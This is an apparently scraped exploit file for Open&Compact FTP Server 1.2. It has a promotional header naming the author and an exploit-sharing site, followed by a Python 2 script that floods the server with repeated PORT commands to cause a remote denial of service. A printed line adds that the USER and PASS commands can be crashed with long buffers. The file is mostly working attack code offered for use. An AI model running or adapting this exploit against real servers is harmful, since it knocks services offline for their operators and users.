40 lines
No EOL
1.5 KiB
Python
Executable file
40 lines
No EOL
1.5 KiB
Python
Executable file
=============================================================================
|
|
# Tilte: Open&Compact Ftp Server 1.2 "PORT" command Remote Denial of Service.
|
|
=============================================================================
|
|
|
|
# Date....................: [22-05-2010]
|
|
# Author..................: [Ma3sTr0-Dz]
|
|
# Location ...............: [Algeria]
|
|
# Software ...............: [Open&Comapct Ftp Server 1.2 "PORT" command Remote Denial of Service]
|
|
# Impact..................: [Remote]
|
|
# Site Software ..........: [http://sourceforge.net/projects/open-ftpd/]
|
|
# Sptnx ..................: [CmOs_CLR & Sec4ever Memberz.]
|
|
# Home : .................: [Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8 Exploits !]
|
|
# Contact me : ...........: [o5m@hotmail.de]
|
|
# Vulnerability: Remote Denial of service .
|
|
# Part ExplOit & Bug Codes :
|
|
---
|
|
|
|
#!/usr/bin/python
|
|
|
|
import socket
|
|
|
|
print '---------------------------------------------------------------------'
|
|
print ' Open&Compact Ftp Server 1.2 "PORT" command Remote Denial of Service'
|
|
print ' url: http://sourceforge.net/projects/open-ftpd'
|
|
print ' author: Ma3sTr0-Dz'
|
|
print ' mail: o5m@hotmail.de'
|
|
print ' site: www.sec4ever.com'
|
|
print ' USER and PASS methods are vulnerable too, just pass "A: " * 1000'
|
|
print ' as buffer'
|
|
print '---------------------------------------------------------------------'
|
|
|
|
buffer = "A" * 5
|
|
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect(("127.0.0.1",21))
|
|
s.send('USER %s\r\n' % "anonymous")
|
|
|
|
for i in range(1,31):
|
|
s.send('PORT %s\n\n' % buffer)
|
|
print "Sending request n. " + str(i) |